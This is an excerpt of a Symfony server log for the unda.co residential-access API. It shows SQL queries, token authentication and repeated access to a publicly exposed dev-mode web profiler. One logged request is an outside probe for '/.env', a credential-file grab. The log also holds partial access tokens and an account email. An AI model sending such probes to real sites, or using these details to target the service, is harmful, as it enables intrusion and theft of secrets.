  5733. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [456,289,1] []
  5734. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
  5735. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [1] []
  5736. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [289,1] []
  5737. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [289,1] []
  5738. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5739. [2025-12-19 18:29:00] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  5740. [2025-12-19 18:29:11] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"1","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"0e68cb7a-f1fe-4ab5-8725-9966f6367196","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/0e68cb7a-f1fe-4ab5-8725-9966f6367196/invitation/20/1?order=desc","method":"GET"} []
  5741. [2025-12-19 18:29:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5742. [2025-12-19 18:29:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5743. [2025-12-19 18:29:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5744. [2025-12-19 18:29:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5745. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
  5746. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5747. [2025-12-19 18:29:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5748. [2025-12-19 18:29:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5749. [2025-12-19 18:29:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5750. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
  5751. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [456,289,1] []
  5752. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
  5753. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [1] []
  5754. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 20 [289,1] []
  5755. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [289,1] []
  5756. [2025-12-19 18:29:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5757. [2025-12-19 18:29:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  5758. [2025-12-19 18:29:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d9f60","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d9f60","method":"GET"} []
  5759. [2025-12-19 18:29:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5760. [2025-12-19 18:30:06] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"1c67aaac-1433-4e96-a101-5d615007d5fb","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/1c67aaac-1433-4e96-a101-5d615007d5fb/providers","method":"GET"} []
  5761. [2025-12-19 18:30:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5762. [2025-12-19 18:30:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5763. [2025-12-19 18:30:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5764. [2025-12-19 18:30:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5765. [2025-12-19 18:30:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
  5766. [2025-12-19 18:30:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5767. [2025-12-19 18:30:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5768. [2025-12-19 18:30:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5769. [2025-12-19 18:30:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5770. [2025-12-19 18:30:06] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  5771. [2025-12-19 18:30:54] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5772. [2025-12-19 18:32:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"45494f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/45494f?panel=swiftmailer","method":"GET"} []
  5773. [2025-12-19 18:32:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5774. [2025-12-19 18:33:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=logger","method":"GET"} []
  5775. [2025-12-19 18:33:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5776. [2025-12-19 18:34:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5777. [2025-12-19 18:41:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=swiftmailer","method":"GET"} []
  5778. [2025-12-19 18:41:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5779. [2025-12-19 18:43:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=exception","method":"GET"} []
  5780. [2025-12-19 18:43:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  5781. [2025-12-19 18:45:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5782. [2025-12-19 18:46:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5783. [2025-12-19 18:46:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f66ec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f66ec6?panel=dump","method":"GET"} []
  5784. [2025-12-19 18:46:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5785. [2025-12-19 18:46:45] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"2fe6ee","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/2fe6ee","method":"GET"} []
  5786. [2025-12-19 18:49:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=cache","method":"GET"} []
  5787. [2025-12-19 18:49:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5788. [2025-12-19 18:51:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aae23e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/aae23e?panel=events","method":"GET"} []
  5789. [2025-12-19 18:51:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  5790. [2025-12-19 18:59:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
  5791. [2025-12-19 19:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=time","method":"GET"} []
  5792. [2025-12-19 19:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5793. [2025-12-19 19:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"58f4a5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/58f4a5?panel=validator","method":"GET"} []
  5794. [2025-12-19 19:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5795. [2025-12-19 19:10:12] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3f708d","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/3f708d/search/results?limit=10&method=GET","method":"GET"} []
  5796. [2025-12-19 19:10:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  5797. [2025-12-19 19:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=swiftmailer","method":"GET"} []
  5798. [2025-12-19 19:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5799. [2025-12-19 19:18:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=logger","method":"GET"} []
  5800. [2025-12-19 19:18:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5801. [2025-12-19 19:22:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fde7a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2fde7a?panel=router","method":"GET"} []
  5802. [2025-12-19 19:22:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  5803. [2025-12-19 19:25:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5804. [2025-12-19 19:25:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5805. [2025-12-19 19:32:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8967d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8967d9?panel=time","method":"GET"} []
  5806. [2025-12-19 19:32:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5807. [2025-12-19 19:39:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c","method":"GET"} []
  5808. [2025-12-19 19:39:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5809. [2025-12-19 19:39:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5810. [2025-12-19 19:43:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
  5811. [2025-12-19 19:43:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5812. [2025-12-19 19:53:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
  5813. [2025-12-19 19:53:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5814. [2025-12-19 19:54:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5815. [2025-12-19 20:01:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
  5816. [2025-12-19 20:01:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5817. [2025-12-19 20:04:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"417fde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/417fde?panel=router","method":"GET"} []
  5818. [2025-12-19 20:04:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  5819. [2025-12-19 20:04:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5820. [2025-12-19 20:04:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5821. [2025-12-19 20:09:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b5b8fb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b5b8fb","method":"GET"} []
  5822. [2025-12-19 20:09:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5823. [2025-12-19 20:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2fe6ee","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2fe6ee?panel=twig","method":"GET"} []
  5824. [2025-12-19 20:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5825. [2025-12-19 20:27:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1812fa","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1812fa?panel=logger","method":"GET"} []
  5826. [2025-12-19 20:27:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5827. [2025-12-19 20:29:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
